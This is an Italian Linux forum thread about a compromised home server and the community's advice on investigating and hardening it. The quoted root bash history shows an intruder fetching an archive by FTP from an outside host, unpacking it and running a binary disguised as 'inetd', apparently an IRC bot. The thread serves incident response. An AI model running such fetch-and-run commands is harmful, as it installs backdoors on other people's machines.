Problema GRAVE di sicurezza

[FabioHV]

ciao a tutti,

l'altro giorno qualcuno a violato il mio pc di casa!!!!

La macchina in questione e' un piccolo server casalingo che utilizzo per i client torrent e robe varie.

Sulla macchina ho installato il seguente script per iptables:

Codice:

#Imposta le police delle catene a Drop
        iptables -P INPUT DROP
        iptables -P FORWARD DROP
        iptables -P OUTPUT  DROP
        #
        # INPUT rules
        #
        # Serve a tenere traccia delle connessione e a stabilire se un pacchetto appartiene a una di esse o meno
        #Related = il pacchetto ha qualche relazione con un'altra connessione già stabilita;
        #Established = il pacchetto fa parte di una connessione già stabilita;
        #
        iptables -A INPUT -i $iface -m state --state RELATED,ESTABLISHED -j ACCEPT
        #
        iptables -A INPUT -s localhost -d localhost -j ACCEPT # localhost
        iptables -A INPUT -i $iface -p tcp --dport 80 -j ACCEPT #Traffico http
        iptables -A INPUT -i $iface -p udp --dport 80 -j ACCEPT #Traffico http
        iptables -A INPUT -i $iface -p tcp --dport 8080 -j ACCEPT #Traffico http alternative
        iptables -A INPUT -i $iface -p udp --dport 8080 -j ACCEPT #Traffico http alternative
        iptables -A INPUT -i $iface -p tcp --dport 443 -j ACCEPT #Traffico https
        iptables -A INPUT -i $iface -p udp --dport 443 -j ACCEPT #Traffico https
        iptables -A INPUT -i $iface -p tcp --dport 22 -j ACCEPT # SSH
        iptables -A INPUT -i $iface -p tcp --dport 21 -j ACCEPT # ftp
        iptables -A INPUT -i $iface -p tcp --dport 5222 -j ACCEPT # gaim
        iptables -A INPUT -i $iface -p tcp --dport 6881 -j ACCEPT #torrent
        # FORWARD rules
        iptables -A FORWARD -s 192.168.0.0/20 -j ACCEPT
        iptables -A FORWARD -d 192.168.0.0/20 -j ACCEPT
        #
        # OUTPUT rules
        # New = il pacchetto inizia una nuova connessione;
        iptables -A OUTPUT -o $iface -m state --state NEW,RELATED,ESTABLISHED -j ACCEPT
        iptables -A OUTPUT -o $iface1 -j ACCEPT
        #
        # Abilitare il FORWARD
        iptables -t nat -A POSTROUTING -o $iface -j MASQUERADE #mascheramento ip rete lan
        echo 1 > /proc/sys/net/ipv4/ip_forward

il server lo controllo tramite ssh con $miodominio.dyndns.org.

L'altro giorno mi sono accorto che non mi lasciava piu' autenticarmi come utente root, mi diceva pass errata. Tramite grub sono riuscito a cambiare la pass di root e ho immediatamente staccato il pc da internet.
Ho notato in /root/.bash_history:

Codice:

w
passwd
cat /proc/cpuinfo
cd /var/tmp
ftp
apt-get install ftp
ftp forexbv.trei.ro
tar xvf emechi.tar
cd emech
./inetd
exit
w
ps x
exit
w
ps x
kill -9 1189
cd /var/tmp
cd emech
./inetd 
exit

sono andato in /var/tmp/emech
e sono presenti i seguenti file:

Codice:

-rw-r--r-- 1 root root   5776 21 giu 22:30 emech1.seen
-rw-r--r-- 1 root root   5850 21 giu 22:30 emech2.seen
-rw-r--r-- 1 root root   7313 21 giu 22:30 emech.seen
-rw-r--r-- 1 root root   1335 26 giu 11:40 Fanky.seen
-rwxrwxrwx 1 root root 504464 10 feb  2005 inetd
-rw-r--r-- 1 root root   1779 26 giu 11:40 Ingerel.seen
-rwxrwxrwx 1 root root  22936 10 feb  2005 kswap.help
-rwxrwxrwx 1 root root   1085 26 giu 11:00 kswap.levels
-rwxrwxrwx 1 root root      6 24 giu 14:41 kswap.pid
-rw-r--r-- 1 root root   1033 26 giu 11:00 kswap.session
-rwxrwxrwx 1 root root   3088 16 gen 20:40 kswap.set
-rwxrwxrwx 1 root root   1772 26 giu 07:36 LinkEvents
-rwxrwxrwx 1 root root     89 26 giu 11:00 mech1.users
-rwxrwxrwx 1 root root     89 26 giu 11:00 mech2.users
-rwxrwxrwx 1 root root     89 26 giu 11:00 mech3.users
drwxrwxrwx 2 root root   4096 28 nov  2007 randfiles

il file inetd e' in file binario e non cipisco che cosa faccia.

i processi attivi sono i seguenti:

Codice:

PID TTY          TIME CMD
    1 ?        00:00:02 init
    2 ?        00:00:00 kthreadd
    3 ?        00:00:00 migration/0
    4 ?        00:00:00 ksoftirqd/0
    5 ?        00:00:00 watchdog/0
    6 ?        00:00:05 events/0
    7 ?        00:00:00 khelper
   38 ?        00:00:01 kblockd/0
   41 ?        00:00:00 kacpid
   42 ?        00:00:00 kacpi_notify
  111 ?        00:00:00 kseriod
  143 ?        00:00:00 pdflush
  145 ?        00:00:03 kswapd0
  146 ?        00:00:00 aio/0
  681 ?        00:00:00 ksuspend_usbd
  685 ?        00:00:00 khubd
  692 ?        00:00:00 ata/0
  699 ?        00:00:00 ata_aux
 1004 ?        00:00:00 md0_raid1
 1398 ?        00:00:01 kjournald
 1688 ?        00:00:00 udevd
 2090 ?        00:00:00 kgameportd
 2367 ?        00:00:00 ksnapd
 2395 ?        00:00:00 kjournald
 2514 ?        00:00:04 dhclient3
 2729 ?        00:00:01 syslogd
 2736 ?        00:00:00 klogd
 2745 ?        00:00:00 dbus-daemon
 2757 ?        00:00:00 sshd
 2824 ?        00:00:00 acpid
 2835 ?        00:00:01 ddclient
 2908 ?        00:00:01 nmbd
 2910 ?        00:00:00 smbd
 2921 ?        00:00:00 smbd
 2922 ?        00:00:01 hald
 2923 ?        00:00:00 hald-runner
 2934 ?        00:00:00 hald-addon-inpu
 2946 ?        00:00:00 hald-addon-acpi
 2947 ?        00:00:02 hald-addon-stor
 2959 ?        00:00:16 hald-addon-stor
 2969 ?        00:00:00 mdadm
 2977 ?        00:00:00 dhcpd3
 2995 ?        00:00:00 cron
 3017 ?        00:00:00 xdm
 3022 tty7     00:00:00 Xorg
 3025 tty1     00:00:00 getty
 3026 tty2     00:00:00 getty
 3029 tty3     00:00:00 getty
 3031 tty4     00:00:00 getty
 3032 tty5     00:00:00 getty
 3033 tty6     00:00:00 getty
 3044 ?        00:00:00 xdm
 3270 ?        00:21:30 Xvnc4
 3283 ?        00:00:00 vncconfig
 3284 ?        00:00:00 xfce4-terminal
 3285 ?        00:00:00 x-window-manage
 3286 ?        00:00:00 sh
 3291 ?        00:00:10 xscreensaver
 3294 ?        00:00:00 ssh-agent
 3299 ?        00:00:00 dbus-launch
 3300 ?        00:00:00 dbus-daemon
 3303 ?        00:00:00 xfce4-session
 3309 ?        00:00:00 gnome-pty-helpe
 3310 pts/1    00:00:00 bash
 3313 ?        00:00:00 xfce-mcs-manage
 3323 ?        00:00:03 xfce4-panel
 3325 ?        00:00:02 Thunar
 3327 ?        00:00:00 gam_server
 3329 ?        00:00:07 xfdesktop
 3330 ?        00:00:02 xfce4-menu-plug
 3341 ?        01:40:31 deluge
 3354 ?        00:00:21 python
 4086 ?        00:00:03 pdflush
27593 ?        00:00:00 sshd
27596 ?        00:00:00 sshd
27598 pts/0    00:00:00 bash
27611 pts/0    00:00:00 su
27612 pts/0    00:00:00 bash
28517 pts/0    00:00:00 ps

Ora vi chiedo:
come faccio a sapere come sono riusciti ad entrare nel mio pc e autenticarsi come root(la pass era di 9 cifre con lettere,numeri,e caratteri speciali)??

che cavolo fa sto inted che mi hanno installato???

e soprattutto che cosa devo fare per evitare che si ripeta questo cosa??

[pmate]

il server lo controllo tramite ssh con $miodominio.dyndns.org.

L'altro giorno mi sono accorto che non mi lasciava piu' autenticarmi come utente root, mi diceva pass errata.
...
...
e soprattutto che cosa devo fare per evitare che si ripeta questo cosa??

Ciao,
come impostazione di sicurezza è sconsigliato permettere l'accesso a ssh all'utente root. Bisognerebbe disabilitarlo in /etc/ssh/sshd_config, accedere come utente non privilegiato e poi con su -  acquisire i privilegi di root.
Per il resto, emech mi ricorda un bot irc.
Ho visto che sul tuo serverino hai thunar e compagnia bella, quindi xfce presumo.
Anche questo non è consigliabile da un punto di vista della sicurezza

[niusiland]

che cavolo fa sto inted che mi hanno installato???

Se guardi qui puoi scoprire che
Inetd si pone in ascolto su tutte le porte TCP ed UDP usate dai servizi internet quali FTP, POP3, o Telnet. Quando un pacchetto TCP o un pacchetto UDP arriva con un determinato numero di porta, inetd lancia l'appropriato servizio per stabilire la connessione.

Non so però darti consigli sul come prevenire ulteriori attacchi.

Ciao,
Andrea

[metaldaze]

L'inetd in questione non è il normale demone indicato da niusiland, anche perché, a giudicare dall'history,  si trova dentro la directory del tar prelevato dal "bontempone" via ftp. La scelta di un nome tanto comune è strumentale al mascheramento dell'eseguibile malevolo. Cosa faccia nello specifico è difficile dirlo: sarebbe utile sapere quali connessioni vengono stabilite, tramite il comando netstat, e magari sniffarne il traffico.
Il consiglio di pmate di impedire l'accesso a root via ssh è ottimo, anche se è più facile che l'accesso sia stato fatto con un utente non privilegiato e, una volta dentro il sistema, sia stata recuperata, in qualche modo che ignoro, la password di root. Intanto darei anche un'occhiata ai log di autenticazione in /var/log/auth.log per vedere se è stato tentato un brute force su un utente in particolare.

[More+]

per prevenire attacchi di brute force via ssh puoi installare fail2ban

http://guide.debianizzati.org/index.php/Fail2ban

More+

[niusiland]

L'inetd in questione non è il normale demone indicato da niusiland, anche perché, a giudicare dall'history,  si trova dentro la directory del tar prelevato dal "bontempone" via ftp.

Ops... Scusate "l'ignuransa"

[MaXeR]

ciao!
come procedura potresti:
1) installare rkhunter e fare un controllo (dovrebbe esserci una pagina sulla wiki)
2) sicuramente ti troverà qualche comando corrotto (presumo last/w/ps)
3) se è così, stacca il disco, attaccalo ad un'altra macchina, salva i dati e pialla tutto

dal momento che la macchina è stata bucata, non è più affidabile  e quindi è buona norma rifarla

Relativamente alle buone norme di sicurezza, alcune cose importanti:
- disabilitare l'accesso da parte dell'utente root
- installare un software come fail2ban
- installare un file integrity checker (integrit, ho appena scritto una paginetta)
- chiudere il più possibile i servizi (firewall)


PS: se ti vuoi togliere qualche sfizio (e fare una piccola indagine) scaricati anche i log (sempre se non li hanno "corretti") e spulciali

[tindal]

come faccio a sapere come sono riusciti ad entrare nel mio pc e autenticarsi come root(la pass era di 9 cifre con lettere,numeri,e caratteri speciali)??

hai aggiornato ssh dopo l'ultimo advisory? (basta che fai un update e vedi se per es. aptitude ti segnala aggiornamenti di sicurezza su ssh e ssl)

se non l'hai fatto eri estremamente vulnerabile ad attacchi man-in-the-middle, con cui possono aver intercettato tutto il tuo traffico, autenticazioni ssh comprese

controlla nei log di ssh se si sono correttamente autenticati direttamente come root o se hanno scalato i privilegi: magari la password di un utente non privilegiato era molto più semplice

tieni presente che un attaccante con i diritti di root può fare veramente tutto, per es. può modificare il comportamento dei programmi che conosci: come suggerisce maxer, verifica e nel caso rasa tutto a zero

che cavolo fa sto inted che mi hanno installato???

è evidente che questo processo che viene avviato con ./inetd è un programma mascherato da inetd (un programma molto comune su un server) che però fa tutt'altro: per sapere cosa fa dovresti leggerne il codice, ma molto spesso chi attacca in questo modo si lascia dietro una backdoor, ovvero un altro modo per entrare

potrebbe essere un server irc modificato, o un client irc che si connette ad un server in attesa di ordini (server e client irc modificati sono tipici per questi scopi, perchè sono semplici da usare, funzionali e si nascondono bene nel resto del traffico irc)

è molto curioso che ti abbiano cambiato la password di root, perchè questo equivale a farti sapere che sono entrati, e chi fa sul serio non ha di certo questo scopo (tra l'altro poteva anche cancellare la history dei comandi): non sarà qualcuno che conosci?

e soprattutto che cosa devo fare per evitare che si ripeta questo cosa??

dopo aver ripristinato il sistema con la certezza di non avere più tracce di irruzione,
1- tieni sotto controllo gli aggiornamenti di sicurezza, almeno per i servizi accessibili da internet
2- cura di più la configurazione di ssh: spostalo dalla porta 22, abbinalo ad un anti-scanner (fail2ban, portsentry, ecc.), disabilita l'accesso a root (come già detto)
3- se puoi, separa i servizi di pubblica di utilità (http, ftp, ecc.) da quelli di amministrazione e sicurezza (firewall, ssh, ecc.) in due pc separati, eventualmente virtuali

per ora non mi viene in mente altro

ciao
tindal

[seg]

E' molto improbabile (anche se non impossibile) un brutefoce con password da 9 non in dizionario: cerca di capire chi/come è entrato (guardando log e altro).

Hai anche altre porte aperte, fa anche da server web?
Hai un server Vnc attivo?

[pmate]

Ti posto un link che forse ti potrebbe essere utile:
http://www.debian.org/doc/manuals/securing-debian-howto/index.en.html

C'è un sacco di roba da attenzionare ed è trattata in maniera sistematica. Fino adesso ho sempre dato occhiate più o meno distratte ma credo sia una buona occasione per approfondire meglio.

Ciao

[FabioHV]

Per prima cosa ringrazio tutti per le risposte; mi scuso per non essere stato molto attivo nella discussione, ma mi si è fulminato il modem ADSL.... (a riprova che il vecchio Murphy http://it.wikipedia.org/wiki/Legge_di_Murphy ha sempre ragione!!!)

Cmq...

Questo l'avevo fatto:

come impostazione di sicurezza è sconsigliato permettere l'accesso a ssh all'utente root. Bisognerebbe disabilitarlo in /etc/ssh/sshd_config, accedere come utente non privilegiato e poi con su -  acquisire i privilegi di root.

Poi guardando il file /var/log/auth.log ho notato che il personaggio in questione era da un paio di giorni che provava user name e pass a caso, finchè non mi sono collegato io da remoto e, molto probabilmente, mi ha sniffato il traffico e autenticazione, come sostiene tindal

hai aggiornato ssh dopo l'ultimo advisory? (basta che fai un update e vedi se per es. aptitude ti segnala aggiornamenti di sicurezza su ssh e ssl)

se non l'hai fatto eri estremamente vulnerabile ad attacchi man-in-the-middle, con cui possono aver intercettato tutto il tuo traffico, autenticazioni ssh comprese

infatti era un pò che non aggiornavo il server!!! mea culpa.

Notavo che nel file /var/log/auth.log sono presenti 2 indirizzi ip, da dove venivano tentate le connessioni, ad esempio:

Codice:

Failed password for invalid user takagi from 190.16.86.XXX port 42734 ssh2

oppure

Codice:

Failed password for root from 207.44.184.XXX port 48558 ssh2

Mi possono servire queste informazioni oppure no???

Ti posto un link che forse ti potrebbe essere utile:
http://www.debian.org/doc/manuals/securing-debian-howto/index.en.html

grazie della segnalazione!!!

Ciao
Fabio

[More+]

Notavo che nel file /var/log/auth.log sono presenti 2 indirizzi ip, da dove venivano tentate le connessioni, ad esempio:

Codice:

Failed password for invalid user takagi from 190.16.86.XXX port 42734 ssh2

oppure

Codice:

Failed password for root from 207.44.184.XXX port 48558 ssh2

Mi possono servire queste informazioni oppure no???

Al massimo, sempre se il tizio è uno sprovveduto, riesci a risalire la provenienza del suo provider, con servizi come questo
http://www.geobytes.com/IpLocator.htm.

L'unica cosa che puoi fare legalmente è denunciare l'accaduto alla polizia postale.

[MaXeR]

si, ma se e' all-infuori dell'Italia, serve a ben poco

[Teox80]

Ho visto che sul tuo serverino hai thunar e compagnia bella, quindi xfce presumo.
Anche questo non è consigliabile da un punto di vista della sicurezza

Ciao,
vorrei chiederti per cortesia di approfondire questa affermazione: dici che xfce non è sicuro?

[tindal]

tutta le applicazioni grafiche sono state scritte senza badare alla sicurezza: un server non ha bisogno della grafica, anche perchè molto spesso non ha un monitor

il server X di per sè è intrinsecamente insicuro, e nessuno si metterà mai a lavorare sulla sua sicurezza

in generale, per un server la regola è: tutto quello che non c'è non si può rompere

quei log che trovi nel file auth.log non penso che possano servire a qualcosa: nella grande maggioranza dei casi provengono da ip dinamici, e molto probabilmente sono virus

se la password di root contiene lettere minuscole, maiuscole, numeri e punteggiatura, e non è meno di 7-8 caratteri puoi ignorare questi tentativi: un programma in locale che prova 500000 password al secondo ci può mettere qualche giorno ad indovinare una password così, mentre un attaccante da remoto non ce la può fare in meno di qualche secolo

se ti danno fastidio sposta ssh dalla porta 22 (come già detto, peraltro)

se usi un ip dinamico, ti suggerisco un metodo con cui mi trovo bene:
sposti ssh, installi portsentry e lo imposti con una sensibilità alta (portsentry si mette in ascolto su un certo numero di porte, e se un ip tenta una connessione su alcune di queste porte lo banna aggiungendo una regola di iptables e anche una riga in /etc/hosts.deny)

poichè la rete è piena di virus che ti faranno scansioni, hosts.deny tende a riempirsi di ip inutili, perchè quasi sempre dinamici
quindi metti su uno script che una o due volte al giorno controlla se /etc/hosts.deny ha raggiunto una certa lunghezza (diciamo 20 righe) e in tal caso lo vuota (magari facendone un backup), riazzera iptables e rieffettua la connessione al provider

in questo modo non ti resta spazzatura, ma non corri il rischio di rendere inutile il lavoro di portsentry, perchè rifacendo la connessione il provider ti cambia ip, e un presunto attaccante deve comunque ricominciare da zero

ciao
tindal